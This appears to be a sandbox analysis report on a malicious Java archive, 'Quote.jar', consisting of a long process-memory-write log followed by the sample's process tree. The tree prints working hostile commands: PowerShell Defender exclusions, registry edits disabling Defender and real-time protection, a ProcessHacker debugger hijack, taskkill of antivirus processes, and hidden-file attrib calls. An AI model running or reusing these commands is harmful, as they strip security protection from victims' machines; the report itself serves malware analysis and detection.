wrote to memory of 2232 2116 cmd.exe 167 PID 2116 wrote to memory of 2232 2116 cmd.exe 167 PID 2116 wrote to memory of 2232 2116 cmd.exe 167 PID 1460 wrote to memory of 2224 1460 java.exe 168 PID 1460 wrote to memory of 2224 1460 java.exe 168 PID 1460 wrote to memory of 2224 1460 java.exe 168 PID 2224 wrote to memory of 2308 2224 cmd.exe 169 PID 2224 wrote to memory of 2308 2224 cmd.exe 169 PID 2224 wrote to memory of 2308 2224 cmd.exe 169 PID 2224 wrote to memory of 2368 2224 cmd.exe 170 PID 2224 wrote to memory of 2368 2224 cmd.exe 170 PID 2224 wrote to memory of 2368 2224 cmd.exe 170 PID 1460 wrote to memory of 2364 1460 java.exe 171 PID 1460 wrote to memory of 2364 1460 java.exe 171 PID 1460 wrote to memory of 2364 1460 java.exe 171 PID 2364 wrote to memory of 2416 2364 cmd.exe 172 PID 2364 wrote to memory of 2416 2364 cmd.exe 172 PID 2364 wrote to memory of 2416 2364 cmd.exe 172 PID 2364 wrote to memory of 2412 2364 cmd.exe 173 PID 2364 wrote to memory of 2412 2364 cmd.exe 173 PID 2364 wrote to memory of 2412 2364 cmd.exe 173 PID 1460 wrote to memory of 2468 1460 java.exe 174 PID 1460 wrote to memory of 2468 1460 java.exe 174 PID 1460 wrote to memory of 2468 1460 java.exe 174 PID 2468 wrote to memory of 2548 2468 cmd.exe 175 PID 2468 wrote to memory of 2548 2468 cmd.exe 175 PID 2468 wrote to memory of 2548 2468 cmd.exe 175 PID 2468 wrote to memory of 2580 2468 cmd.exe 176 PID 2468 wrote to memory of 2580 2468 cmd.exe 176 PID 2468 wrote to memory of 2580 2468 cmd.exe 176 PID 1460 wrote to memory of 1504 1460 java.exe 177 PID 1460 wrote to memory of 1504 1460 java.exe 177 PID 1460 wrote to memory of 1504 1460 java.exe 177 PID 1504 wrote to memory of 1852 1504 cmd.exe 178 PID 1504 wrote to memory of 1852 1504 cmd.exe 178 PID 1504 wrote to memory of 1852 1504 cmd.exe 178 PID 1504 wrote to memory of 1048 1504 cmd.exe 179 PID 1504 wrote to memory of 1048 1504 cmd.exe 179 PID 1504 wrote to memory of 1048 1504 cmd.exe 179 PID 1460 wrote to memory of 572 1460 java.exe 180 PID 1460 wrote to memory of 572 1460 java.exe 180 PID 1460 wrote to memory of 572 1460 java.exe 180 PID 572 wrote to memory of 1004 572 cmd.exe 181 PID 572 wrote to memory of 1004 572 cmd.exe 181 PID 572 wrote to memory of 1004 572 cmd.exe 181 PID 572 wrote to memory of 2040 572 cmd.exe 182 PID 572 wrote to memory of 2040 572 cmd.exe 182 PID 572 wrote to memory of 2040 572 cmd.exe 182 PID 1460 wrote to memory of 2596 1460 java.exe 183 PID 1460 wrote to memory of 2596 1460 java.exe 183 PID 1460 wrote to memory of 2596 1460 java.exe 183 PID 2596 wrote to memory of 1824 2596 cmd.exe 184 PID 2596 wrote to memory of 1824 2596 cmd.exe 184 PID 2596 wrote to memory of 1824 2596 cmd.exe 184 PID 2596 wrote to memory of 1836 2596 cmd.exe 185 PID 2596 wrote to memory of 1836 2596 cmd.exe 185 PID 2596 wrote to memory of 1836 2596 cmd.exe 185 PID 1460 wrote to memory of 1888 1460 java.exe 186 PID 1460 wrote to memory of 1888 1460 java.exe 186 PID 1460 wrote to memory of 1888 1460 java.exe 186 PID 1888 wrote to memory of 1840 1888 cmd.exe 187 PID 1888 wrote to memory of 1840 1888 cmd.exe 187 PID 1888 wrote to memory of 1840 1888 cmd.exe 187 PID 1888 wrote to memory of 1376 1888 cmd.exe 188 PID 1888 wrote to memory of 1376 1888 cmd.exe 188 PID 1888 wrote to memory of 1376 1888 cmd.exe 188 PID 1460 wrote to memory of 1416 1460 java.exe 189 PID 1460 wrote to memory of 1416 1460 java.exe 189 PID 1460 wrote to memory of 1416 1460 java.exe 189 PID 1416 wrote to memory of 756 1416 cmd.exe 190 PID 1416 wrote to memory of 756 1416 cmd.exe 190 PID 1416 wrote to memory of 756 1416 cmd.exe 190 PID 1416 wrote to memory of 1492 1416 cmd.exe 191 PID 1416 wrote to memory of 1492 1416 cmd.exe 191 PID 1416 wrote to memory of 1492 1416 cmd.exe 191 PID 1460 wrote to memory of 1584 1460 java.exe 192 PID 1460 wrote to memory of 1584 1460 java.exe 192 PID 1460 wrote to memory of 1584 1460 java.exe 192 PID 1584 wrote to memory of 1204 1584 cmd.exe 193 PID 1584 wrote to memory of 1204 1584 cmd.exe 193 PID 1584 wrote to memory of 1204 1584 cmd.exe 193 PID 1584 wrote to memory of 940 1584 cmd.exe 194 PID 1584 wrote to memory of 940 1584 cmd.exe 194 PID 1584 wrote to memory of 940 1584 cmd.exe 194 PID 1460 wrote to memory of 2080 1460 java.exe 195 PID 1460 wrote to memory of 2080 1460 java.exe 195 PID 1460 wrote to memory of 2080 1460 java.exe 195 PID 2080 wrote to memory of 1792 2080 cmd.exe 196 PID 2080 wrote to memory of 1792 2080 cmd.exe 196 PID 2080 wrote to memory of 1792 2080 cmd.exe 196 PID 2080 wrote to memory of 1676 2080 cmd.exe 197 PID 2080 wrote to memory of 1676 2080 cmd.exe 197 PID 2080 wrote to memory of 1676 2080 cmd.exe 197 PID 1460 wrote to memory of 2632 1460 java.exe 198 PID 1460 wrote to memory of 2632 1460 java.exe 198 PID 1460 wrote to memory of 2632 1460 java.exe 198 PID 2632 wrote to memory of 2676 2632 cmd.exe 199 PID 2632 wrote to memory of 2676 2632 cmd.exe 199 PID 2632 wrote to memory of 2676 2632 cmd.exe 199 PID 2632 wrote to memory of 2044 2632 cmd.exe 200 PID 2632 wrote to memory of 2044 2632 cmd.exe 200 PID 2632 wrote to memory of 2044 2632 cmd.exe 200 PID 1460 wrote to memory of 1940 1460 java.exe 201 PID 1460 wrote to memory of 1940 1460 java.exe 201 PID 1460 wrote to memory of 1940 1460 java.exe 201 PID 1940 wrote to memory of 1864 1940 cmd.exe 202 PID 1940 wrote to memory of 1864 1940 cmd.exe 202 PID 1940 wrote to memory of 1864 1940 cmd.exe 202 PID 1940 wrote to memory of 2692 1940 cmd.exe 203 PID 1940 wrote to memory of 2692 1940 cmd.exe 203 PID 1940 wrote to memory of 2692 1940 cmd.exe 203 PID 1460 wrote to memory of 2716 1460 java.exe 204 PID 1460 wrote to memory of 2716 1460 java.exe 204 PID 1460 wrote to memory of 2716 1460 java.exe 204 PID 2716 wrote to memory of 2268 2716 cmd.exe 205 PID 2716 wrote to memory of 2268 2716 cmd.exe 205 PID 2716 wrote to memory of 2268 2716 cmd.exe 205 PID 2716 wrote to memory of 2436 2716 cmd.exe 206 PID 2716 wrote to memory of 2436 2716 cmd.exe 206 PID 2716 wrote to memory of 2436 2716 cmd.exe 206 PID 1460 wrote to memory of 2748 1460 java.exe 207 PID 1460 wrote to memory of 2748 1460 java.exe 207 PID 1460 wrote to memory of 2748 1460 java.exe 207 PID 2748 wrote to memory of 2752 2748 cmd.exe 208 PID 2748 wrote to memory of 2752 2748 cmd.exe 208 PID 2748 wrote to memory of 2752 2748 cmd.exe 208 PID 2748 wrote to memory of 2020 2748 cmd.exe 209 PID 2748 wrote to memory of 2020 2748 cmd.exe 209 PID 2748 wrote to memory of 2020 2748 cmd.exe 209 PID 1460 wrote to memory of 1796 1460 java.exe 210 PID 1460 wrote to memory of 1796 1460 java.exe 210 PID 1460 wrote to memory of 1796 1460 java.exe 210 PID 1796 wrote to memory of 2144 1796 cmd.exe 211 PID 1796 wrote to memory of 2144 1796 cmd.exe 211 PID 1796 wrote to memory of 2144 1796 cmd.exe 211 PID 1796 wrote to memory of 2276 1796 cmd.exe 212 PID 1796 wrote to memory of 2276 1796 cmd.exe 212 PID 1796 wrote to memory of 2276 1796 cmd.exe 212 PID 1460 wrote to memory of 2172 1460 java.exe 213 PID 1460 wrote to memory of 2172 1460 java.exe 213 PID 1460 wrote to memory of 2172 1460 java.exe 213 PID 2172 wrote to memory of 2328 2172 cmd.exe 214 PID 2172 wrote to memory of 2328 2172 cmd.exe 214 PID 2172 wrote to memory of 2328 2172 cmd.exe 214 PID 2172 wrote to memory of 1556 2172 cmd.exe 215 PID 2172 wrote to memory of 1556 2172 cmd.exe 215 PID 2172 wrote to memory of 1556 2172 cmd.exe 215 PID 1460 wrote to memory of 240 1460 java.exe 216 PID 1460 wrote to memory of 240 1460 java.exe 216 PID 1460 wrote to memory of 240 1460 java.exe 216 PID 240 wrote to memory of 2008 240 cmd.exe 217 PID 240 wrote to memory of 2008 240 cmd.exe 217 PID 240 wrote to memory of 2008 240 cmd.exe 217 PID 240 wrote to memory of 2196 240 cmd.exe 218 PID 240 wrote to memory of 2196 240 cmd.exe 218 PID 240 wrote to memory of 2196 240 cmd.exe 218 PID 1460 wrote to memory of 2724 1460 java.exe 219 PID 1460 wrote to memory of 2724 1460 java.exe 219 PID 1460 wrote to memory of 2724 1460 java.exe 219 PID 2724 wrote to memory of 2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2916 2908 cmd.exe 233 PID 2908 wrote to memory of 2916 2908 cmd.exe 233 PID 2908 wrote to memory of 2916 2908 cmd.exe 233 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 1460 wrote to memory of 2128 1460 java.exe 246 PID 1460 wrote to memory of 2128 1460 java.exe 246 PID 1460 wrote to memory of 2128 1460 java.exe 246 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 2712 wrote to memory of 2732 2712 cmd.exe 259 PID 2712 wrote to memory of 2732 2712 cmd.exe 259 PID 2712 wrote to memory of 2732 2712 cmd.exe 259 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 1460 wrote to memory of 1048 1460 java.exe 273 PID 1460 wrote to memory of 1048 1460 java.exe 273 PID 1460 wrote to memory of 1048 1460 java.exe 273 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1896 attrib.exe 1868 attrib.exe 1828 attrib.exe 1832 attrib.exe 1756 attrib.exe 1852 attrib.exe 1284 attrib.exe 1900 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1852
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1284
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\UaoPj\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1900
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\UaoPj\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1896
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1868
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\UaoPj\SbBYi.class2⤵
- Views/modifies file attributes
PID:1756
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1580
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1996
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\UaoPj','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\UaoPj\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1956
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:2036
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1180
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:368
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1388
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1568
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1072
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1532
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1148
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1124
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1864
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1888
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1044
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1056
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1740
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1992
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1996
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1424
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:756
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1084
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1772
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1872
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1052
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1948
-
-
-
